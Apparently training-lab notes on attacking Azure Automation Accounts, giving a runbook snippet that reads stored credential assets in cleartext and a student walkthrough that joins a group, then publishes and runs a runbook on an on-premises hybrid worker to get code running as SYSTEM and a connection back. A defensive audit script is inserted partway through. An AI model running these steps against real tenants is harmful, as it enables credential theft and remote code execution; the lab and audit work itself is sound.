Automation Accounts

Extract sensitive information by running scripts inside the automation account:

  • runbooks can read the credential assets linked to the automation account, so try to access those from a runbook
  • always go through the existing runbooks
    • their code may embed or reference additional credentials

The following snippet, run from inside a runbook, retrieves a credential asset (the ones listed in the Azure portal under the automation account's Credentials) in cleartext:

# 'creds' is the name of the credential asset as shown in the portal
$creds = Get-AutomationPSCredential -Name 'creds'
# GetNetworkCredential() exposes the Password property in cleartext
$creds.GetNetworkCredential() | fl *

Abusing Hybrid Workers

  • a runbook can be targeted at a “hybrid worker group”
    • these are non-Azure machines (on-premises or other clouds) that execute the runbook locally; on Windows workers it runs as SYSTEM, on Linux workers as nxworker
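The two exposure paths above (credential assets readable from runbook code, and runbooks that can be scheduled onto hybrid workers) can be reviewed together from the defender's side. The following audit script is an added example, not part of the original notes; it assumes Az.Accounts and Az.Automation are installed, that Connect-AzAccount has already been run with read access to the subscription, and that the job object's HybridWorker property is populated for jobs that ran on a hybrid worker. The credential-reference regex is a heuristic of my own, not an Azure API.

```powershell
# Added audit script (not from the original notes). Per runbook it reports which credential
# assets the runbook source reads via Get-AutomationPSCredential, which hybrid worker groups
# exist in the account, and how many past jobs of that runbook actually ran on a hybrid worker.
param([ValidateSet('Published', 'Draft')][string]$Slot = 'Published')

$work = Join-Path ([System.IO.Path]::GetTempPath()) 'runbook-audit'
New-Item -ItemType Directory -Path $work -Force | Out-Null
# Heuristic (assumption): matches Get-AutomationPSCredential -Name 'x', "x" or x
$credPattern = 'Get-AutomationPSCredential\s+(?:-Name\s+)?[''"]?([^''"\s]+)'
$rank = @{ High = 0; Medium = 1; Low = 2 }

$findings = foreach ($acct in Get-AzAutomationAccount) {
    $rg = $acct.ResourceGroupName
    $aa = $acct.AutomationAccountName
    # Credential assets are what a runbook receives from Get-AutomationPSCredential.
    $assets = @(Get-AzAutomationCredential -ResourceGroupName $rg -AutomationAccountName $aa)
    # Jobs started with -RunOn execute on these machines instead of the Azure sandbox.
    $groups = @(Get-AzAutomationHybridWorkerGroup -ResourceGroupName $rg -AutomationAccountName $aa)
    foreach ($rb in Get-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa) {
        # Export the runbook source so credential references can be found in the code itself.
        Export-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa -Name $rb.Name `
            -Slot $Slot -OutputFolder $work -Force -ErrorAction SilentlyContinue | Out-Null
        $src = Get-ChildItem -Path $work -Filter "$($rb.Name).*" -File | Select-Object -First 1
        $code = if ($src) { Get-Content -Raw -Path $src.FullName } else { '' }
        $credsRead = @([regex]::Matches($code, $credPattern) |
            ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique)
        # Job history: HybridWorker is set (assumption) only for jobs that ran on a hybrid worker.
        $hybridJobs = @(Get-AzAutomationJob -ResourceGroupName $rg -AutomationAccountName $aa -RunbookName $rb.Name |
            Where-Object { $_.HybridWorker })
        # A runbook that reads credential assets in an account with hybrid workers combines both paths.
        $risk = if ($credsRead.Count -and $groups.Count) { 'High' }
                elseif ($credsRead.Count -or $groups.Count) { 'Medium' } else { 'Low' }
        [pscustomobject]@{
            Account            = $aa
            Runbook            = $rb.Name
            State              = $rb.State
            CredentialsRead    = ($credsRead -join ', ')
            CredentialAssets   = $assets.Count
            HybridWorkerGroups = ($groups.Name -join ', ')
            HybridJobs         = $hybridJobs.Count
            Risk               = $risk
        }
    }
}
# The exported runbook sources are sensitive; do not leave them on disk.
Remove-Item -Path $work -Recurse -Force -ErrorAction SilentlyContinue
$findings | Sort-Object { $rank[$_.Risk] }, Account, Runbook | Format-Table -AutoSize
```

Rows ranked High are the runbooks to review first: anyone who can edit and start them can both read the referenced credentials and run code as SYSTEM on the worker machines.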

Example with automation task

$ az ad signed-in-user show # get the SIP ProxyAddress of the current user
$ az automation account list
$ az ad signed-in-user list-owned-objects # we own the group that manages runbooks
$ az account get-access-token --resource-type aad-graph # AAD Graph token, so that we can use PowerShell
$ az account get-access-token # ARM access token
PS> $AADToken = "aad-graph-token"
PS> Connect-AzureAD -AadAccessToken $AADToken -TenantId tenantid -AccountId accountid
PS> Add-AzureADGroupMember -ObjectId groupid -RefObjectId user-id-of-mark -Verbose # not opsec-safe
PS> $AccessToken = "access-token"
PS> Connect-AzAccount -AccessToken $AccessToken -GraphAccessToken $AADToken -AccountId accountid
PS> Get-AzRoleAssignment
PS> Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Engineering # note the group "Name"
PS> Import-AzAutomationRunbook -Name student1 -Type PowerShell -Path c:\azad\tools\student1.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
PS> Publish-AzAutomationRunbook -RunbookName student1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
PS> Start-AzAutomationRunbook -RunbookName student1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
# waiting for the connection back

Enumeration

PS C:\Windows\system32> az ad signed-in-user show

# "objectId": "f66e133c-bd01-4b0b-b3b7-7cd949fd45f3"
# "userPrincipalName": "[email protected]"

# now we see that we are the owner of the 'automation admins' group
az ad signed-in-user list-owned-objects --query '[].[displayName]'

# which resources can we see?
az resource list --query '[].[name, type]' -o table

az extension add --upgrade -n automation
az automation account list # shows an error, cannot see anything (maybe because I am the owner of the group, not a member)

az ad signed-in-user list-owned-objects
# see that I can use runbooks (automation admins)

# list hybrid worker groups
PS C:\Users\studentuser64> Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Engineering
 
 
ResourceGroupName     : Engineering
AutomationAccountName : HybridAutomation
Name                  : Workergroup1
RunbookWorker         : {defeng-adcsrv.defeng.corp}
GroupType             : User

Abuse

# import, publish and run a runbook
Import-AzAutomationRunbook -Name student64 -Path C:\AzAD\Tools\student64.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
 
Publish-AzAutomationRunbook -RunbookName student64 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
 
# and start the task
Start-AzAutomationRunbook -RunbookName student64 -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose